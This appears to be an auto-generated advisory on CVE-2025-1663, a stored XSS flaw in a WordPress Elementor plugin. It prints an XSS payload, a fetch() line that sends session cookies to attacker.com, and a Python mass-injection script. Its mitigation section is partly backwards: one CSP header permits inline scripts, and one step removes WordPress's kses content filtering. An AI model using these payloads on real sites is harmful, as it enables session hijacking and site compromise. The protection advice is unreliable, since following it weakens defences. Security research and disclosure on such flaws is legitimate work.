How CVE-2025-1663 Works
The Unlimited Elements For Elementor WordPress plugin (up to v1.5.142) fails to sanitize user inputs and escape outputs in multiple widgets. Authenticated attackers with Contributor-level access or higher can inject malicious JavaScript payloads into pages. When other users visit the compromised page, the script executes in their browser, enabling session hijacking, defacement, or malware distribution. The vulnerability stems from insecure handling of widget parameters, allowing arbitrary script embedding via unsanitized attributes.
DailyCVE Form:
Platform: WordPress
Version: ≤1.5.142
Vulnerability: Stored XSS
Severity: Medium
Date: 04/10/2025
What Undercode Say:
Exploitation:
1. Payload Injection:
< svg onload=alert(document.cookie)>
Insert via widget parameters (e.g., custom HTML/JS fields).
2. Exfiltrate Cookies:
fetch('https://attacker.com/steal?data='+btoa(document.cookie));
3. Mass Injection:
import requests
wp_session = {'wordpress_logged_in': 'COOKIE'}
payload = {'widget_param': '<script>malicious_code</script>'}
requests.post('https://target.com/wp-admin/post.php', data=payload, cookies=wp_session)
Protection:
1. Update Plugin:
wp plugin update unlimited-elements-for-elementor
2. Input Sanitization:
$clean_input = sanitize_text_field($_POST['widget_param']);
3. Content Security Policy (CSP):
Header set Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline'"
4. Firewall Rules:
location ~ /wp-content/plugins/unlimited-elements/ {
deny all;
}
5. Log Monitoring:
grep -r "onload=|javascript:" /var/www/html/wp-content/
6. Disable Contributor Scripts:
remove_filter('pre_post_content', 'wp_filter_post_kses');
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1663
Extra Source Hub:
Undercode
